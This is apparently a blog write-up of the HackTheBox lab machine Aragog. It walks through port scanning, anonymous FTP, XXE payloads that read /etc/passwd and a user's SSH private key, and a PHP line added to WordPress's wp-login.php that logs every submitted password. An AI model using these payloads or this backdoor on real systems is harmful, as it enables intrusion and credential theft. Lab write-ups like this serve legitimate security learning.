Hey Everyone! Here is another cool machine from hackthebox and its named Aragog! Its a medium level linux machine exploiting one of the owasp top 10 vulnerability. Let’s dive deep to find out the how the box gets pwned.
The initial foothold is based on exploiting the way the server parses the xml data therefore leading to XXE. The privilege escalation to root is based upon how password logging can be done via creating a php backdoor in wordpress.
With all that said, lets get started!!
Starting with nmap scan
⚡root@kali$~/Desktop/htb/aragog> cat aragog.nmap # Nmap 7.70 scan initiated Sat Jul 18 19:30:47 2020 as: nmap -sC -sV -o aragog.nmap 10.10.10.78 Nmap scan report for 10.10.10.78 Host is up (0.27s latency). Not shown: 997 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_-r--r--r-- 1 ftp ftp 86 Dec 21 2017 test.txt | ftp-syst: | STAT: | FTP server status: | Connected to ::ffff:10.10.14.2 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | At session startup, client count was 2 | vsFTPd 3.0.3 - secure, fast, stable |_End of status 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 ad:21:fb:50:16:d4:93:dc:b7:29:1f:4c:c2:61:16:48 (RSA) | 256 2c:94:00:3c:57:2f:c2:49:77:24:aa:22:6a:43:7d:b1 (ECDSA) |_ 256 9a:ff:8b:e4:0e:98:70:52:29:68:0e:cc:a0:7d:5c:1f (ED25519) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Apache2 Ubuntu Default Page: It works Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Sat Jul 18 19:31:08 2020 -- 1 IP address (1 host up) scanned in 21.76 seconds
There was ftp open with allowed anonymous login. So I quickly fired up ftp to see the contents. There was a file test.txt that i downloaded on my local machine.
root@kali ~/Desktop/htb/aragog master ftp 10.10.10.78Connected to 10.10.10.78. 220 (vsFTPd 3.0.3) Name (10.10.10.78:root): anonymous 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> dir 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. -r--r--r-- 1 ftp ftp 86 Dec 21 2017 test.txt 226 Directory send OK. ftp> get test.txt local: test.txt remote: test.txt 200 PORT command successful. Consider using PASV. 150 Opening BINARY mode data connection for test.txt (86 bytes). 226 Transfer complete. 86 bytes received in 0.00 secs (1.4141 MB/s)
Contents of test.txt
⚡root@kali$~/Desktop/htb/aragog> cat test.txt <details> <subnet_mask>255.255.255.192</subnet_mask> <test></test> </details>
As of now the contents of file dont make any sense. So just made the note of file.
Started up a gobuster scan as port 80 was open
# gobuster -u http://10.10.10.68 -w /usr/share/seclists/Discovery/Web-Content/big.txt -t 50 -x php
Got a file hosts.php
On page http://10.10.10.78/hosts.php, a page landed
So that is a vague information, but seems like some sort of hosts calculation. So I captured the request in burp and added the contents of test.txt obtained earlier.
Cool !! It is calculation hosts based on the subnet mask provided. But an interesting thing to look it that request is containing xml. So the only thing that comes to mind is XXE!!
I googled for payloadallthethings crafted a payload to see if i am able to retrieve the contents of local files such as /etc/passwd
<?xml version="1.0"?><!DOCTYPE test [<!ENTITY test1 SYSTEM 'file:///etc/passwd'>]> <details> <subnet_mask>&test1;</subnet_mask> <test></test> </details>
Awesome! The contents are visible and I could see 2 users listed florian and cliff. As a next step, I tried to grep any id_rsa files if present.
/home/cliff/.ssh/id_rsa didnt worked out but /home/florian/.ssh/id_rsa worked like a charm and now I have the RSA private key.
<?xml version="1.0"?><!DOCTYPE test [<!ENTITY test1 SYSTEM 'file:///home/florian/.ssh/id_rsa'>]> <details> <subnet_mask>&test1;</subnet_mask> <test></test> </details>
I then logged in with florian
# chmod 600 id_rsa # ssh -i id_rsa email@example.com # cat user.txt
I uploaded LinEnum.sh to the box and enumerated and surprisingly there were a lot of wordpress files present. There was a folder dev_wiki that had the wordpress installed but didnt got enumerated in the gobuster scan. There are a lots of enumeration results that can lead you to wrong direction like password of database in wp-config file. Yes you are definitely gonna find the administrator password hash in the tables, but its simply uncrackable.
After listing the contents of dev_wiki, I found out that it was world writable.
So I went to http://aragog/dev_wiki to find out any useful information. Do an entry in /etc/hosts as 10.10.10.78 aragog so that the page can be fully rendered (ps: there’s virtual routing).
I found a blog by Administrator. Here the user cliff has administrator privileges. Also he writes that he’ll be logging in regularly, which means that his password can be sniffed using a backdoor in WordPress.
Let’s see how we can make one
Open wp-login.php under dev_wiki and under the switch operation: login add the following line. The code is gonna create a file named .passwords and will store the username and password as anyone logs in. Since we read in the blog earlier, that cliff will be logging in regularly, we will end up getting his password.
file_put_contents(".passwords", $_POST['log']. ":". $_POST['pwd']. "\n", FILE_APPEND);
Here’s the dummy request to check if out payload is working fine or not ( the step is optional)
So A new file has been created.
Lets grab the contents
Amazing we found the password!
So lets try out the password with different accounts like cliff/root. And it worked with root!! (As the users have the habit of reusing passwords!)
The privilege escalation of the box is totally based upon real world situations where users tend to use same passwords at multiple places that should be totally avoided. Passwords should always be built of random characters and should stored in a trusted password manager.
Thats all for the blog post! Thanks for reading!!
See you in the next one ! Until then, happy hunting 🙂